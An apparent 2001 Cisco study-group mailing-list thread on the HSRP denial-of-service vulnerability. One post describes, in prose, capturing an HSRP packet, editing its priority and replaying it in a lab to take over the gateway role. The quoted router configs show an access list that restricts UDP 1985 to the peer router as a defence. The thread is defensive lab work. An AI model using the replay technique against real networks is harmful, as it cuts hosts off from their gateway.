I tried the HSRP access list from Brian (CCIE) and it works, (of course. ;-)
It was surprisingly easy to hack HSRP! :-[] I captured some HSRP packets
with EtherPeek and edited one to say the packet was from my PC and that my
priority was higher than the two legitimate HSRP routers. I then repeatedly
sent this packet, using the timer that the legitimate HSRP routers were
using.
The standby HSRP stopped sending HSRP packets (not sure why?) The
previously active made itself standby. PCs on the LAN that were set to use
the HSRP gateway address were unable to reach non-local stations. The DOS
worked, in other words. This is a lab network, by the way.
I used the access list below to make sure the HSRP routers only accepted
from each other and it solved the problem. I meant to save the
HyperTerminal session and show you that the deny in the access list was
getting invoked, but I forgot to save it.
Note one minor bug in configs below:
It should say "ip access-group 100 in" (at least on my routers, the ip was
required)
Priscilla
At 03:54 AM 5/8/01, Brian Dennis wrote:
>It's not the best solution but if you're really worried you could create an
>access-list (see configs below). HSRP uses UDP port 1985 and the destination
>address is to all routers (224.0.0.2). Perfect solution? No. Better than
>nothing? Yes.
>
>Brian Dennis, CCIE #2210 (R&S)(ISP/Dial) CCSI #98640
>5G Networks, Inc.
>[EMAIL PROTECTED]
>(925) 260-2724
>
>!
>hostname R1
>interface Ethernet 0
> ip address 192.168.1.1 255.255.255.0
> standby ip 192.168.1.254
> standby authentication c!sc0b2b
> access-group 100 in
>!
>access-list 100 permit udp host 192.168.1.2 eq 1985 host 224.0.0.2 eq 1985
>access-list 100 deny udp any eq 1985 any eq 1985
>access-list 100 permit ip any any
>
>
>!
>hostname R2
>!
>interface Ethernet 0
> ip address 192.168.1.2 255.255.255.0
> standby ip 192.168.1.254
> standby authentication c!sc0b2b
> access-group 100 in
>!
>access-list 100 permit udp host 192.168.1.1 eq 1985 host 224.0.0.2 eq 1985
>access-list 100 deny udp any eq 1985 any eq 1985
>access-list 100 permit ip any any
>
>
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > Jacques Atlas
> > Sent: Monday, May 07, 2001 11:10 PM
> > To: [EMAIL PROTECTED]
> > Subject: RE: Cisco HSRP Denial of Service Vulnerability [7:3534]
> >
> >
> > On Tue, 8 May 2001, Curtis Call wrote:
> >
> > |In other words always use authentication.
> >
> > i dont think the authentication in clear text is going to help,
> > the solution from the vendor is to run HSRP with IPSec.
> >
> > --
> > jacques
> > FAQ, list archives, and subscription info:
> > http://www.groupstudy.com/list/cisco.html
> > Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
________________________
Priscilla Oppenheimer
http://www.priscilla.com
Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=3680&t=3534
--------------------------------------------------
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
